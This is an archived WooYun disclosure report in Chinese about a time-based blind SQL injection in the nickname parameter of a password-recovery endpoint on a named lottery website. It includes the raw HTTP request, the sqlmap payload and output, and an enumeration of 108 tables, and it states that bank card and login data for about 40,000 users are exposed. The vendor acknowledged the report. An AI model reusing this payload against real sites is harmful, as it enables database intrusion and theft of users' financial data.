乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-21: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
POST /customer/ajax_findpass.php HTTP/1.1Content-Length: 205Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.touzhu.cn:80/Cookie: PHPSESSID=7hfbkooam8urame7hfmo3gstd1; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1442677065,1442677097,1442677127,1442677203; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1442677203; HMACCOUNT=38616D555896F654; box_wxts=on; bdshare_firstime=1442675805431Host: www.touzhu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*actionc=checknickname&nickname=e&suijishu=0.11496315198019147&username=e
nickname参数
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: actionc=checknickname&nickname=e' AND (SELECT * FROM (SELECT(SLEEP(5)))MjPa) AND 'WgMi'='WgMi&suijishu=0.11496315198019147&username=e---web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12current database: 'caiso'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: actionc=checknickname&nickname=e' AND (SELECT * FROM (SELECT(SLEEP(5)))MjPa) AND 'WgMi'='WgMi&suijishu=0.11496315198019147&username=e---web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12Database: caiso[108 tables]+------------------------------+| activity_activities || activity_activity_detail || activity_cz_jj || admin_channel || admin_class || admin_friendly_link || admin_help_center || admin_permissions || admin_role || admin_role_function || admin_syslogs || admin_user || admin_winprize || business_article || business_article_category || business_article_inlink || business_back_money_request || business_bonus || business_chase || business_chaseitem || business_city_no || business_community || business_company || business_customer || business_customer_commission || business_email || business_feedback || business_filedownlod || business_league || business_league_rank || business_match_arrange || business_match_arrange_test || business_match_history || business_match_mapping || business_match_team_mapping || business_mobile || business_odd || business_order || business_order_queue || business_order_temp || business_part || business_partner || business_pay || business_pay_out_request || business_payment_request || business_plan || business_plan_item || business_prize_level || business_recharge_gift || business_restricted || business_sms_log || business_sms_mo_log || business_sms_partner || business_soft_update || business_supplier || business_system_param || business_team || business_term || business_term_type_config || business_ticket || business_wallet || business_wallet_log || business_win_describe_order || business_win_describe_ticket || business_win_prize || business_you_hui_ma || event_class || event_code || event_give || event_login || event_oscar2015 || event_oscar2015_award || event_oscar2015_items || event_packet || event_packet_class || event_pay || odds || sessions || sm_queue || tz_agent || tz_agent_discount || tz_agent_invite || tz_apppay_temp || tz_balance || tz_balance_items || tz_checkmobile || tz_config || tz_discount_plan || tz_discount_plan_items || tz_event_pay || tz_fetch500_data || tz_focuslist || tz_indexitems || tz_lottery_date || tz_lotterytype || tz_matchbind || tz_password_code || tz_sclass || tz_spend || tz_spend_tmp || tz_team || tz_user_discount || tz_user_money || tz_userlogin || v_match || v_matchbind || v_matchforjcm || v_matchlist |+------------------------------+
4万彩民朋友:
涉及银行卡号,账号用户名和密码等关键信息:
危害等级:高
漏洞Rank:15
确认时间:2015-09-23 12:05
谢谢路大关注.已经转给程序.
暂无